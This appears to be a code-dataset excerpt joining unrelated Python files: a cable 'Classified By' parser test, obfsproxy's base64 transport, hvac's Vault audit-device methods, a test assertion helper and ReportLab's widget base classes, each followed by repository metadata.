CLASSIFIED BY: ISN ? PATRICIA A. MCNERNEA, ACTING
ASSISTANT SECRETARY, REASON 1.4 (B) AND (D)
'''),
(u'03OTTAWA2182', u'Mary Witt', u'''
Classified By: A/ Pol Min Mary Witt for reasons 1.5(b) and (d)
'''),
(u'03KUWAIT3762', u'FRANK URBANCIC', u'''
Classified By: CDA FRANK URBANCIC BASED UPON REASONS 1.5 (B) AND (D)
'''),
(u'07DAKAR1464', u'GARY SCHAAF', u'''
Classified By: A/LEGATT GARY SCHAAF FOR RASONS 1.4 (B) AND (D).
'''),
(u'07HARARE680', u'Glenn Warren', u'''
Classified By: Pol/Econ Chief Glenn Warren under 1.4 b/d
'''),
(u'09DHAKA775', u'James Moriarty', u'''
Classified By: Ambassador James Moriarty for for reasons 1.4 b and d.
'''),
(u'', u'Kelly A. Keiderling', u'''
Classified By: CDA Kelly A. Keiderling under 1.4 (b) and (d)
'''),
(u'04HARARE1722', u'Paul Weisenfeld', u'''
Classified By: Classified by Charge d'Affaires Paul Weisenfeld under Se
ction 1.5 b/d
'''),
(u'05SANTIAGO2540', u'SEAN MURPHY', u'''
Classified By: CONSUL GENERAL SEAN MURPHY
1. In a December 19 m'''),
(u'04HELSINKI1420', u'Earle I. Mack', u'''
Classified By: Ambassador Earle I. Mack for reasons 1.5(B) and (D)
Summary
-------
'''),
(u'08PORTAUPRINCE520', u'Janet A. Sanderson', u'''
Classified By: Ambassado Janet A. Sanderson for reasons 1.4 (b) and (d
)
'''),
(u'97SOFIA3097', u'B0HLEN', u'''
1.(U) CLASSIFIED BY AMBASSAD0R B0HLEN. REAS0N:
1.5(B,D).
'''),
(u'99TUNIS2120', u'R0BIN L. RAPHEL', u'''
(U) CLASSIFIED BY AMBASSAD0R R0BIN L. RAPHEL BASED 0N 1.5 (B)
AND (D).
'''),
(u'08TBILISI1121', u'John F. Tefft', u'''
Classified By: Ambassadot John F. Tefft for reason 1.4 (b) and (d).
'''),
(u'07ANKARA2522', u'ROSS WILSON', u'''
Classified By: AMBASSADR ROSS WILSON FOR REASONS 1.4 (B) AND (D)
'''),
(u'09UNVIEVIENNA531', u'Glyn T. Davies', u'''
Classified By: Ambassadro Glyn T. Davies, reasons 1.4 (b) and (d)
'''),
(u'09TBILISI463', u'JOHN F. TEFFT', u'''
Classified By: AMBSSADOR JOHN F. TEFFT. REASONS: 1.4 (B) AND (D).
'''),
(u'09LUSAKA523', u'Donald E. Booth', u'''
Classified By: Classified By: Ambbassador Donald E. Booth for
Reasons 1.4 (b) and (d)
'''),
(u'07BAKU486', u'Anne E. Derse', u'''
Classified By: Ambssador Anne E. Derse, Reasons 1.4 (b,d)
'''),
(u'09ANKARA63', u'A.F. Godfrey', u'''
Classified By: Pol-Mil Counselor A.F. Godfrey
Will Not Break Silence...
-------------------------
1. (C) I'''),
(u'03SANAA1319', u'ALAN MISENHEIMER', u'''
Classified By: CHARGE ALAN MISENHEIMER F0R REASONS 1.5 (B) AND (D)
'''),
(u'08BAKU668', u'Alan Eyre', u'''
Classified By: Acting Pol/Econ Chief Alan Eyre
(S) In '''),
(u'07SINGAPORE285', u'Ike Reed', u'''
Classified By: Economical and Political Chief Ike Reed;
reasons 1.4 (b) and (d)
'''),
(u'07KHARTOUM832', u'Roberto Powers', r'''
Classified By: CDA Roberto Powers a.y., Sea3on: Sectaons 9.Q (b+`ald$hd
)Q
Q,----/-Qswmmfrq
=,=--=HQ(@(RBF!&}ioSQB3wktf0r,vu qDWTel$1` \ulQlQO~jcvq>&Mw~ifw(U= ;QGM?QQx7Ab8QQ@@)\Minawi suggested that
intelligence chief Salah Ghosh was the sole interlocutor with
the "statesmanship" and influence within the regime to defuse
tensions with the international community. Embassy officials
told Minawi that the NCP would need to demonstrate its
genuine desire for better relations by agreeing to an
effective UN peace-keeping operation, which could then lay
the basis for future discussions. Minawi also commented on
Chad's obstruction of the Darfur peace process and an
upcoming visit of Darfurian officials to Arab capitals. End
summary.
-------------'''),
(u'05ANKARA7671', u'Nancy McEldowney', u'''
Classified By: ADANA 222
ADANA 216
ADANA 207
ANKARA 6772
Classified by DCM Nancy McEldowney; reasons 1.4 b and d.
'''),
(u'04HARARE766', u'ROBERT E. WHITEHEAD', u'''
Classified By: DCM ROBERT E. WHITEHEAD DUE TO 1,4 (C) AND (D).
'''),
(u'00TELAVIV4462', u'PSIMONS', u'''C O N F I D E N T I A L TEL AVIV 004462
- - C O R R E C T E D C O P Y - - CLASSIFIED BY LINE ADDED
E.O. 12958: DECL: 08/24/05
TAGS: KWBG, PTER, PGOV, PREL, IS
SUBJECT: BIN LADIN CONNECTION IN GAZA FOUND PUZZLING;
CONNECTION TO HAMAS QUESTIONED
CLASSIFIED BY DCM PSIMONS PER 1.5 (B) AND (D)
'''),
)
_TEST_CABLES = (
(u'10BANGKOK468', ()),
(u'08STATE110079', ()),
(u'05VILNIUS1093', u'Derrick Hogan'),
(u'08STATE20184', ()),
(u'08STATE20332', ()),
(u'09ANKARA63', u'A.F. Godfrey'),
(u'03COLOMBO1348', u'Alex Moore'),
(u'03COLOMBO1810', u'Alex Moore'),
(u'66BUENOSAIRES2481', ()),
(u'05TAIPEI153', ()),
(u'09TELAVIV2643', ()),
(u'09BOGOTA2917',()),
(u'07TOKYO5202', ()),
(u'07USUNNEWYORK319', ()),
(u'07VIENNA1239', ()),
(u'09HONGKONG2247', ()),
(u'07TOKYO3205', ()),
(u'09HONGKONG2249', ()),
(u'07BELGRADE533', u'Ian Campbell'),
(u'05AMMAN646', ()),
(u'08BAGHDAD1451', u'Jess Baily'),
(u'08BAGHDAD1650', u'Jess Baily'),
(u'98STATE145892', u'Jeff Millington'),
(u'07TOKYO1414', ()),
(u'06COPENHAGEN1020', u'Bill Mozdzierz'),
(u'07ANKARA1581', u'Eric Green'),
(u'08ANKARA266', u'Eric Green'),
(u'08CHISINAU933', u'Daria Fane'),
(u'10RIGA27', u'Brian Phipps'),
(u'09WARSAW433', u'Jackson McDonald'),
(u'09BAGHDAD2784', u'Anbar'),
(u'05PARIS8353', u'Andrew, C. Koss'),
(u'05ANKARA581', u'John Kunstadter'),
(u'08RANGOON951', u'Drake Weisert'),
(u'10BAGHDAD488', u'John Underriner'),
(u'08STATE2004', u'Gordon Gray'),
(u'10BAGHDAD370', ()),
(u'09BEIJING951', u'Ben Moeling'),
(u'09TOKYO1878', u'Ray Hotz'),
(u'07OTTAWA100', u'Brian Mohler'),
(u'07BAMAKO1322', ()),
(u'09PRISTINA336', u'Michael J. Murphy'),
(u'09PRISTINA345', u'Michael J. Murphy'),
(u'06BAGHDAD4604', u'L. Hatton'),
(u'05ROME178', (u'Castellano', u'Anna della Croce', u'Giovanni Brauzzi')),
(u'08USNATO348', u'W.S. Reid III'),
(u'09KHARTOUM107', u'Alberto M. Fernandez'),
(u'09ABUDHABI901', u'Douglas Greene'),
(u'03KUWAIT2352', u'Frank C. Urbancic'),
(u'09BUENOSAIRES849', u'Tom Kelly'),
(u'08BAGHDAD358', u'Todd Schwartz'),
(u'09BAGHDAD419', u'Michael Dodman'),
(u'10ADDISABABA186', ()),
(u'10ADDISABABA195', ()),
(u'10ASHGABAT178', u'Sylvia Reed Curran'),
(u'09MEXICO2309', u'Charles Barclay'),
(u'09MEXICO2339', u'Charles Barclay'),
(u'05ATHENS1903', u'Charles Ries'),
(u'02VATICAN25', u'Joseph Merante'),
(u'07ATHENS2029', u'Robin'),
(u'09HONGKONG934', ()),
(u'03KATHMANDU1044', u'Robert Boggs'),
(u'08CARACAS420', u'Robert Richard Downes'),
(u'08DHAKA812', u'Geeta Pasi'),
(u'09ULAANBAATAR87', ()),
(u'96JEDDAH948', u'Douglas Neumann'),
(u'09KABUL3161', u'Hoyt Yee'),
(u'03OTTAWA202', u'Brian Flora'),
(u'10GUATEMALA25', u'Drew G. Blakeney'),
(u'07CARACAS2254', u'Robert Downes'),
(u'09BUCHAREST115', u'Jeri Guthrie-Corn'),
(u'09BUCHAREST166', u'Jeri Guthrie-Corn'),
(u'06PANAMA2357', u'Luis Arreaga'),
(u'09JAKARTA1580', u'Ted Osius'),
(u'09JAKARTA1581', u'Ted Osius'),
(u'07ATHENS2219', u'Thomas Countryman'),
(u'09ANKARA1084', u"Daniel O'Grady"),
(u'10ANKARA173', u"Daniel O'Grady"),
(u'10ANKARA215', u"Daniel O'Grady"),
(u'10ANKARA224', u"Daniel O'Grady"),
(u'07BAGHDAD1513', u'Daniel V. Speckhard'),
(u'08TASHKENT1089', u'Jeff Hartman'),
(u'07HELSINKI636', u'Joy Shasteen'),
(u'09STATE57323', u'James Townsend'),
(u'09STATE59436', u'James Townsend'),
(u'07TASHKENT2064', (u'Jeff Hartman', u'Steven Prohaska')),
(u'07DUSHANBE337', u'David Froman'),
(u'07DUSHANBE1589', u'David Froman'),
(u'08SANJOSE762', u'David E. Henifin'),
(u'05BAGHDAD3037', u'David M. Satterfield'),
(u'04AMMAN4133', u'D.Hale'),
(u'06YEREVAN237', u'A.F. Godfrey'),
(u'07DHAKA909', u'Dcmccullough'),
(u'07DHAKA1057', u'DCMcCullough'),
(u'07BAKU1017', u'Donald Lu'),
(u'07USNATO92', u'Clarence Juhl'),
(u'09KAMPALA272', u'Dcronin'),
(u'06LAGOS12', u'Sam Gaye'),
(u'07USNATO548', u'Clarence Juhl'),
(u'07TOKYO436', u'Carol T. Reynolds'),
(u'08STATE116100', u'Theresa L. Rusch'),
(u'07NEWDELHI5334', u'Ted Osius'),
(u'06BAGHDAD4350', u'Zalmay Khalilzad'),
(u'07STATE141771', u'Scott Marciel'),
(u'08STATE66299', u'David J. Kramer'),
(u'09STATE29700', u'Karen Stewart'),
(u'07NAIROBI4569', u'Jeffrey M. Roberts'),
(u'02HARARE2628', u'Rewhitehead'),
(u'04HARARE766', u'Robert E. Whitehead'),
(u'04ANKARA7050', u'John Kunstadter'),
(u'04ANKARA6368', u'Charles O. Blaha'),
(u'09BAGHDAD280', ()),
(u'05ABUJA1323', ()),
(u'07MONROVIA1375', u'Donald E. Booth'),
(u'03SANAA2434', u'Austin G. Gilreath'),
(u'07BRUSSELS3482', u'Maria Metcalf'),
(u'02KATHMANDU1201', u'Pete Fowler'),
(u'09STATE2522', u'Donald A. Camp'),
(u'09STATE100197', u'Roblake'),
(u'08COLOMBO213', u'Robert O. Blake, Jr.'),
(u'07MEXICO2653', u'Charles V. Barclay'),
(u'09SOFIA89', u'Mceldowney'),
(u'09ADDISABABA2168', u'Kirk McBride'),
(u'06MINSK338', u'George Krol'),
(u'10ADDISABABA195', ()),
(u'04AMMAN9411', u'Christopher Henzel'),
(u'06CAIRO4258', u'Catherine Hill-Herndon'),
(u'08NAIROBI233', u'John M. Yates'),
(u'06MADRID2993', ()),
(u'08AMMAN1821', ()),
(u'09KABUL1290', u'Patricia A. McNerney'),
(u'06JEDDAH765', u'Tatiana C. Gfoeller'),
(u'07BAGHDAD2045', u'Stephen Buckler'),
(u'07BAGHDAD2499', u'Steven Buckler'),
(u'04THEHAGUE1778', u'Liseli Mundie'),
(u'04THEHAGUE2020', u'John Hucke'),
(u'03HARARE1511', u'R.E. Whitehead'),
(u'03BRUSSELS4518', u'Van Reidhead'),
(u'02ROME4724', u'Douglas Feith'),
(u'08BRUSSELS1149', u'Chris Davis'),
(u'04BRUSSELS862', u'Frank Kerber'),
(u'08BRUSSELS1245', u'Chris Davis'),
(u'08BRUSSELS1458', u'Chris Davis'),
(u'07ISLAMABAD2316', u'Peter Bodde'),
(u'04MADRID764', u'Kathleen Fitzpatrick'),
(u'06BELGRADE1092', u'Ian Campbell'),
(u'07JERUSALEM1523', u'Jake Walles'),
(u'09PANAMA518', u'Barbar J. Stephenson'),
(u'06ABUDHABI409', u'Michelle J Sison'),
(u'07DOHA594', ()),
(u'07LAPAZ3136', u'Mike Hammer'),
(u'08BOGOTA4462', u'John S. Creamer'),
(u'09ATHENS1515', u'Deborah McCarthy'),
(u'09LONDON2347', u'Robin Quinville'),
(u'08LONDON821', u'Richard Mills, Jr.'),
(u'06BUENOSAIRES497', u'Line Gutierrez'),
(u'06BUENOSAIRES596', u'Line Gutierrez'),
(u'06BUENOSAIRES1243', u'Line Gutierrez'),
(u'05BAGHDAD3919', u'Robert Heine'),
(u'06RIYADH8836', u'Mgfoeller'),
(u'06BAGHDAD4422', u'Margaret Scobey'),
(u'08STATE129873', u'David Welch'),
(u'09BAGHDAD2299', u'Patricia Haslach'),
(u'09BAGHDAD2256', u'Phaslach'),
(u'09BAGHDAD2632', u'Phaslach'),
(u'04BAGHDAD697', u'Matthew Goshko'),
(u'05CAIRO8812', u'John Desrocher'),
(u'06HONGKONG4299', ()),
(u'06QUITO646', u'Vanessa Schulz'),
(u'08RIYADH1616', u'Scott McGehee'),
(u'08RIYADH1659', u'Scott McGehee'),
(u'10BAGHDAD481', u'W.S. Reid'),
(u'02KATHMANDU485', u'Pmahoney'),
(u'09BAGHDAD990', u'Robert Ford'),
(u'08BAGHDAD3023', u'Robert Ford'),
(u'09USNATO530', u'Kelly Degnan'),
(u'07LISBON2305', u'Lclifton'),
(u'08BAGHDAD4004', u'John Fox'),
(u'04THEHAGUE2346', u'A. Schofer'),
(u'07TALLINN173', u'Jessica Adkins'),
(u'09BAKU80', u'Rob Garverick'),
(u'06PHNOMPENH1757', u'Jennifer Spande'),
(u'06QUITO1401', u'Ned Kelly'),
(u'05ZAGREB724', u'Justin Friedman'),
(u'05TOKYO1351', u'David B. Shear'),
(u'07KIGALI73', u'G Learned'),
(u'08ZAGREB554', u"Peter D'Amico"),
(u'07TASHKENT1950', (u'R. Fitzmaurice', u'T. Buckley')),
(u'07TASHKENT1679', (u'Richard Fitzmaurice', u'Steven Prohaska')),
(u'07TASHKENT1894', (u'Steven Prohaska', u'Richard Fitzmaurice')),
(u'08STATE68478', u'Margaret McKelvey'),
(u'04BRUSSELS416', u'Marc J. Meznar'),
(u'07BAGHDAD777', u'Jim Soriano'),
(u'05ALMATY3450', u'John Ordway'),
(u'05ACCRA2548', u'Nate Bluhm'),
(u'07ADDISABABA2523', u'Kent Healy'),
(u'09USUNNEWYORK746', u'Bruce C. Rashkow'),
(u'09STATE108370', u'Daniel Fried'),
(u'09BAGHDAD3120', u'Mark Storella'),
(u'09STATE64621', u'Richard C Holbrooke'),
(u'05NAIROBI4757', u'Chris Padilla'),
(u'05CAIRO5945', u'Stuart E. Jones'),
(u'07BAGHDAD1544', u'Steven R. Buckler'),
(u'07BAGHDAD1632', u'Steven R. Buckler'),
(u'02HARARE555', u'Aaron Tarver'),
(u'06BAGHDAD1021', u'Robert S. Ford'),
(u'06PRISTINA280', u'Philip S. Goldberg'),
(u'06SANSALVADOR849', u'Michael A. Butler'),
(u'06SUVA123', u'Larry M. Dinger'),
(u'06AITTAIPEI1142', u'Michael R. Wheeler'),
(u'08BEIRUT471', u'Michele J. Sison'),
(u'08MOSCOW937', u'Eric T. Schultz'),
(u'02HANOI2951', u'Emi Yamauchi'),
(u'08ROME525', u'Tom Delare',),
(u'01HARARE1632', u'Earl M. Irving'),
(u'06DUBAI5421', u'Timothy M. Brys'),
)
def test_parse_classified_by():
def check(expected, content, normalize):
if not isinstance(expected, tuple):
expected = (expected,)
eq_(expected, tuple(parse_classified_by(content, normalize)))
for testcase in _TEST_DATA:
if len(testcase) == 3:
ref_id, expected, content = testcase
normalize = False
else:
ref_id, expected, content, normalize = testcase
yield check, expected, content, normalize
def test_cable_classified_by():
def check(cable_id, expected):
if not isinstance(expected, tuple):
expected = (expected,)
cable = cable_by_id(cable_id)
ok_(cable, 'Cable "%s" not found' % cable_id)
eq_(expected, tuple(cable.classified_by))
for cable_id, expected in _TEST_CABLES:
yield check, cable_id, expected
if __name__ == '__main__':
import nose
nose.core.runmodule()
|
bsd-3-clause
| 7,676,235,879,460,244,000
| 36.018762
| 210
| 0.634053
| false
| 2.249957
| false
| false
| false
|
sunsong/obfsproxy
|
obfsproxy/transports/b64.py
|
1
|
2455
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
""" This module contains an implementation of the 'b64' transport. """
from obfsproxy.transports.base import BaseTransport
import base64
import obfsproxy.common.log as logging
log = logging.get_obfslogger()
def _get_b64_chunks_from_str(string):
"""
Given a 'string' of concatenated base64 objects, return a list
with the objects.
Assumes that the objects are well-formed base64 strings. Also
assumes that the padding character of base64 is '='.
"""
chunks = []
while True:
pad_loc = string.find('=')
if pad_loc < 0 or pad_loc == len(string)-1 or pad_loc == len(string)-2:
# If there is no padding, or it's the last chunk: append
# it to chunks and return.
chunks.append(string)
return chunks
if pad_loc != len(string)-1 and string[pad_loc+1] == '=': # double padding
pad_loc += 1
# Append the object to the chunks, and prepare the string for
# the next iteration.
chunks.append(string[:pad_loc+1])
string = string[pad_loc+1:]
return chunks
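# A quick sanity check of the chunking behaviour (illustrative doctest-style
# sketch; the inputs are hypothetical, well-formed base64 as the docstring
# assumes):
#
#   >>> _get_b64_chunks_from_str('aGk=aGVsbG8=d29ybGQ')
#   ['aGk=', 'aGVsbG8=', 'd29ybGQ']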
class B64Transport(BaseTransport):
"""
    Implements the b64 protocol: a transport that base64-encodes data
    before pushing it to the network.
"""
def __init__(self, transport_config):
super(B64Transport, self).__init__()
def receivedDownstream(self, data):
"""
        Got data from downstream; relay it upstream.
"""
decoded_data = ''
# TCP is a stream protocol: the data we received might contain
# more than one b64 chunk. We should inspect the data and
# split it into multiple chunks.
b64_chunks = _get_b64_chunks_from_str(data.peek())
        # Now b64 decode each chunk and append it to our decoded
        # data.
for chunk in b64_chunks:
try:
decoded_data += base64.b64decode(chunk)
except TypeError:
log.info("We got corrupted b64 ('%s')." % chunk)
return
data.drain()
self.circuit.upstream.write(decoded_data)
def receivedUpstream(self, data):
"""
        Got data from upstream; relay it downstream.
"""
self.circuit.downstream.write(base64.b64encode(data.read()))
return
class B64Client(B64Transport):
pass
class B64Server(B64Transport):
pass
|
bsd-3-clause
| 6,540,606,080,512,612,000
| 25.978022
| 82
| 0.606517
| false
| 4.004894
| false
| false
| false
|
ianunruh/hvac
|
hvac/api/system_backend/audit.py
|
1
|
3598
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Support for "Audit"-related System Backend Methods."""
from hvac.api.system_backend.system_backend_mixin import SystemBackendMixin
class Audit(SystemBackendMixin):
def list_enabled_audit_devices(self):
"""List enabled audit devices.
It does not list all available audit devices.
This endpoint requires sudo capability in addition to any path-specific capabilities.
Supported methods:
GET: /sys/audit. Produces: 200 application/json
:return: JSON response of the request.
:rtype: dict
"""
list_audit_devices_response = self._adapter.get('/v1/sys/audit').json()
return list_audit_devices_response
def enable_audit_device(self, device_type, description=None, options=None, path=None):
"""Enable a new audit device at the supplied path.
The path can be a single word name or a more complex, nested path.
Supported methods:
PUT: /sys/audit/{path}. Produces: 204 (empty body)
:param device_type: Specifies the type of the audit device.
:type device_type: str | unicode
:param description: Human-friendly description of the audit device.
:type description: str | unicode
:param options: Configuration options to pass to the audit device itself. This is
dependent on the audit device type.
        :type options: dict
:param path: Specifies the path in which to enable the audit device. This is part of
the request URL.
:type path: str | unicode
:return: The response of the request.
:rtype: requests.Response
"""
if path is None:
path = device_type
params = {
'type': device_type,
'description': description,
'options': options,
}
api_path = '/v1/sys/audit/{path}'.format(path=path)
return self._adapter.post(
url=api_path,
json=params
)
def disable_audit_device(self, path):
"""Disable the audit device at the given path.
Supported methods:
DELETE: /sys/audit/{path}. Produces: 204 (empty body)
:param path: The path of the audit device to delete. This is part of the request URL.
:type path: str | unicode
:return: The response of the request.
:rtype: requests.Response
"""
api_path = '/v1/sys/audit/{path}'.format(path=path)
return self._adapter.delete(
url=api_path,
)
def calculate_hash(self, path, input_to_hash):
"""Hash the given input data with the specified audit device's hash function and salt.
This endpoint can be used to discover whether a given plaintext string (the input parameter) appears in the
audit log in obfuscated form.
Supported methods:
            POST: /sys/audit-hash/{path}. Produces: 200 application/json
:param path: The path of the audit device to generate hashes for. This is part of the request URL.
:type path: str | unicode
:param input_to_hash: The input string to hash.
:type input_to_hash: str | unicode
        :return: The JSON response of the request.
        :rtype: dict
"""
params = {
'input': input_to_hash,
}
api_path = '/v1/sys/audit-hash/{path}'.format(path=path)
response = self._adapter.post(
url=api_path,
json=params
)
return response.json()
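# Illustrative usage sketch (not part of this module; assumes an hvac.Client
# instance whose `sys` attribute mixes in this class, per the system-backend
# layout):
#
#   client.sys.enable_audit_device('file', options={'file_path': '/var/log/vault_audit.log'})
#   client.sys.list_enabled_audit_devices()
#   client.sys.calculate_hash('file', input_to_hash='some-secret-value')
#   client.sys.disable_audit_device('file')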
|
apache-2.0
| 181,234,886,285,527,170
| 34.27451
| 115
| 0.611451
| false
| 4.345411
| false
| false
| false
|
Melrok/energistream-py
|
tests/verify.py
|
1
|
1840
|
#would like to use difflib here eventually
hashLine = ('#' * 80) + '\n'
class Verify(object):
def str_equal(self, expected, actual, errMessage=None):
        if expected == actual:
            return
if expected is None:
raise AssertionError("{0} expected is None".format(errMessage))
if actual is None:
raise AssertionError("{0} actual is None".format(errMessage))
return self.equal(str(expected), str(actual), errMessage)
def equal(self, expected, actual, err_message=None):
if expected == actual:
return
if type(expected) != type(actual):
message = '\n' + hashLine
message += '\tType mismatch, expected type "{0}"\n\tactually "{1}"'.format(str(type(expected)), str(type(actual)))
message += '\n' + hashLine
raise AssertionError(message)
if err_message is not None:
message = '{0} \n'.format(err_message)
else:
message = '\n'
message += hashLine
message += '\texpected "{0}"\n\tactually "{1}"'.format(str(expected), str(actual))
message += '\n' + hashLine
raise AssertionError(message)
def str_in(self, container, contained, err_message=None):
if err_message is not None:
message = '{0} \n'.format(err_message)
else:
message = '\n'
if container is None:
raise AssertionError("{0} container is None".format(message))
if contained is None:
raise AssertionError("{0} contained is None".format(message))
if contained in container:
return
message += hashLine
message += '\texpected:\t"{0}" \n\tin:\t\t"{1}"'.format(contained, container)
message += '\n' + hashLine
raise AssertionError(message)
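# Illustrative usage sketch (hypothetical test code):
#
#   v = Verify()
#   v.equal(4, 2 + 2)                 # passes silently
#   v.str_in("hello world", "world")  # passes silently
#   v.equal(4, "4")                   # raises AssertionError (type mismatch)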
|
mit
| 895,279,386,831,197,200
| 33.716981
| 126
| 0.573913
| false
| 4.191344
| false
| false
| false
|
tschalch/pyTray
|
src/lib/reportlab/graphics/widgetbase.py
|
1
|
17565
|
#Copyright ReportLab Europe Ltd. 2000-2004
#see license.txt for license details
#history http://www.reportlab.co.uk/cgi-bin/viewcvs.cgi/public/reportlab/trunk/reportlab/graphics/widgetbase.py
__version__=''' $Id: widgetbase.py,v 1.1 2006/05/26 19:19:38 thomas Exp $ '''
import string
from reportlab.graphics import shapes
from reportlab import rl_config
from reportlab.lib import colors
from reportlab.lib.validators import *
from reportlab.lib.attrmap import *
class PropHolder:
'''Base for property holders'''
_attrMap = None
def verify(self):
"""If the _attrMap attribute is not None, this
checks all expected attributes are present; no
unwanted attributes are present; and (if a
checking function is found) checks each
attribute has a valid value. Either succeeds
or raises an informative exception.
"""
if self._attrMap is not None:
for key in self.__dict__.keys():
if key[0] <> '_':
msg = "Unexpected attribute %s found in %s" % (key, self)
assert self._attrMap.has_key(key), msg
for (attr, metavalue) in self._attrMap.items():
msg = "Missing attribute %s from %s" % (attr, self)
assert hasattr(self, attr), msg
value = getattr(self, attr)
args = (value, attr, self.__class__.__name__)
assert metavalue.validate(value), "Invalid value %s for attribute %s in class %s" % args
if rl_config.shapeChecking:
"""This adds the ability to check every attribute assignment
as it is made. It slows down shapes but is a big help when
developing. It does not get defined if rl_config.shapeChecking = 0.
"""
def __setattr__(self, name, value):
"""By default we verify. This could be off
in some parallel base classes."""
validateSetattr(self,name,value)
def getProperties(self,recur=1):
"""Returns a list of all properties which can be edited and
which are not marked as private. This may include 'child
widgets' or 'primitive shapes'. You are free to override
this and provide alternative implementations; the default
one simply returns everything without a leading underscore.
"""
from reportlab.lib.validators import isValidChild
# TODO when we need it, but not before -
# expose sequence contents?
props = {}
for name in self.__dict__.keys():
if name[0:1] <> '_':
component = getattr(self, name)
if recur and isValidChild(component):
# child object, get its properties too
childProps = component.getProperties(recur=recur)
for (childKey, childValue) in childProps.items():
#key might be something indexed like '[2].fillColor'
#or simple like 'fillColor'; in the former case we
#don't need a '.' between me and my child.
if childKey[0] == '[':
props['%s%s' % (name, childKey)] = childValue
else:
props['%s.%s' % (name, childKey)] = childValue
else:
props[name] = component
return props
def setProperties(self, propDict):
"""Permits bulk setting of properties. These may include
child objects e.g. "chart.legend.width = 200".
All assignments will be validated by the object as if they
were set individually in python code.
All properties of a top-level object are guaranteed to be
set before any of the children, which may be helpful to
widget designers.
"""
childPropDicts = {}
for (name, value) in propDict.items():
parts = string.split(name, '.', 1)
if len(parts) == 1:
#simple attribute, set it now
setattr(self, name, value)
else:
(childName, remains) = parts
try:
childPropDicts[childName][remains] = value
except KeyError:
childPropDicts[childName] = {remains: value}
# now assign to children
for (childName, childPropDict) in childPropDicts.items():
child = getattr(self, childName)
child.setProperties(childPropDict)
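    # Illustrative call (hypothetical chart object with a `legend` child):
    #   chart.setProperties({"width": 200, "legend.dx": 10})
    # sets chart.width directly, then routes {"dx": 10} to chart.legend
    # via chart.legend.setProperties(...).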
def dumpProperties(self, prefix=""):
"""Convenience. Lists them on standard output. You
may provide a prefix - mostly helps to generate code
samples for documentation.
"""
propList = self.getProperties().items()
propList.sort()
if prefix:
prefix = prefix + '.'
for (name, value) in propList:
print '%s%s = %s' % (prefix, name, value)
class Widget(PropHolder, shapes.UserNode):
"""Base for all user-defined widgets. Keep as simple as possible. Does
not inherit from Shape so that we can rewrite shapes without breaking
widgets and vice versa."""
def _setKeywords(self,**kw):
for k,v in kw.items():
if not self.__dict__.has_key(k):
setattr(self,k,v)
def draw(self):
msg = "draw() must be implemented for each Widget!"
raise shapes.NotImplementedError, msg
def demo(self):
msg = "demo() must be implemented for each Widget!"
raise shapes.NotImplementedError, msg
def provideNode(self):
return self.draw()
def getBounds(self):
"Return outer boundary as x1,y1,x2,y2. Can be overridden for efficiency"
return self.draw().getBounds()
_ItemWrapper={}
class TypedPropertyCollection(PropHolder):
"""A container with properties for objects of the same kind.
This makes it easy to create lists of objects. You initialize
it with a class of what it is to contain, and that is all you
can add to it. You can assign properties to the collection
as a whole, or to a numeric index within it; if so it creates
a new child object to hold that data.
So:
wedges = TypedPropertyCollection(WedgeProperties)
wedges.strokeWidth = 2 # applies to all
wedges.strokeColor = colors.red # applies to all
wedges[3].strokeColor = colors.blue # only to one
The last line should be taken as a prescription of how to
create wedge no. 3 if one is needed; no error is raised if
there are only two data points.
"""
def __init__(self, exampleClass):
#give it same validation rules as what it holds
self.__dict__['_value'] = exampleClass()
self.__dict__['_children'] = {}
def __getitem__(self, index):
try:
return self._children[index]
except KeyError:
Klass = self._value.__class__
if _ItemWrapper.has_key(Klass):
WKlass = _ItemWrapper[Klass]
else:
class WKlass(Klass):
def __getattr__(self,name):
try:
return self.__class__.__bases__[0].__getattr__(self,name)
except:
if self._index and self._parent._children.has_key(self._index):
if self._parent._children[self._index].__dict__.has_key(name):
return getattr(self._parent._children[self._index],name)
return getattr(self._parent,name)
_ItemWrapper[Klass] = WKlass
child = WKlass()
child._parent = self
if type(index) in (type(()),type([])):
index = tuple(index)
if len(index)>1:
child._index = tuple(index[:-1])
else:
child._index = None
else:
child._index = None
for i in filter(lambda x,K=child.__dict__.keys(): x in K,child._attrMap.keys()):
del child.__dict__[i]
self._children[index] = child
return child
def has_key(self,key):
if type(key) in (type(()),type([])): key = tuple(key)
return self._children.has_key(key)
def __setitem__(self, key, value):
msg = "This collection can only hold objects of type %s" % self._value.__class__.__name__
assert isinstance(value, self._value.__class__), msg
def __len__(self):
return len(self._children.keys())
def getProperties(self,recur=1):
# return any children which are defined and whatever
# differs from the parent
props = {}
for (key, value) in self._value.getProperties(recur=recur).items():
props['%s' % key] = value
for idx in self._children.keys():
childProps = self._children[idx].getProperties(recur=recur)
for (key, value) in childProps.items():
if not hasattr(self,key) or getattr(self, key)<>value:
newKey = '[%s].%s' % (idx, key)
props[newKey] = value
return props
def setVector(self,**kw):
for name, value in kw.items():
for i in xrange(len(value)):
setattr(self[i],name,value[i])
def __getattr__(self,name):
return getattr(self._value,name)
def __setattr__(self,name,value):
return setattr(self._value,name,value)
## No longer needed!
class StyleProperties(PropHolder):
"""A container class for attributes used in charts and legends.
Attributes contained can be those for any graphical element
(shape?) in the ReportLab graphics package. The idea for this
container class is to be useful in combination with legends
and/or the individual appearance of data series in charts.
A legend could be as simple as a wrapper around a list of style
properties, where the 'desc' attribute contains a descriptive
string and the rest could be used by the legend e.g. to draw
something like a color swatch. The graphical presentation of
the legend would be its own business, though.
A chart could be inspecting a legend or, more directly, a list
of style properties to pick individual attributes that it knows
about in order to render a particular row of the data. A bar
chart e.g. could simply use 'strokeColor' and 'fillColor' for
drawing the bars while a line chart could also use additional
ones like strokeWidth.
"""
_attrMap = AttrMap(
strokeWidth = AttrMapValue(isNumber),
strokeLineCap = AttrMapValue(isNumber),
strokeLineJoin = AttrMapValue(isNumber),
strokeMiterLimit = AttrMapValue(None),
strokeDashArray = AttrMapValue(isListOfNumbersOrNone),
strokeOpacity = AttrMapValue(isNumber),
strokeColor = AttrMapValue(isColorOrNone),
fillColor = AttrMapValue(isColorOrNone),
desc = AttrMapValue(isString),
)
def __init__(self, **kwargs):
"Initialize with attributes if any."
for k, v in kwargs.items():
setattr(self, k, v)
def __setattr__(self, name, value):
"Verify attribute name and value, before setting it."
validateSetattr(self,name,value)
class TwoCircles(Widget):
def __init__(self):
self.leftCircle = shapes.Circle(100,100,20, fillColor=colors.red)
self.rightCircle = shapes.Circle(300,100,20, fillColor=colors.red)
def draw(self):
return shapes.Group(self.leftCircle, self.rightCircle)
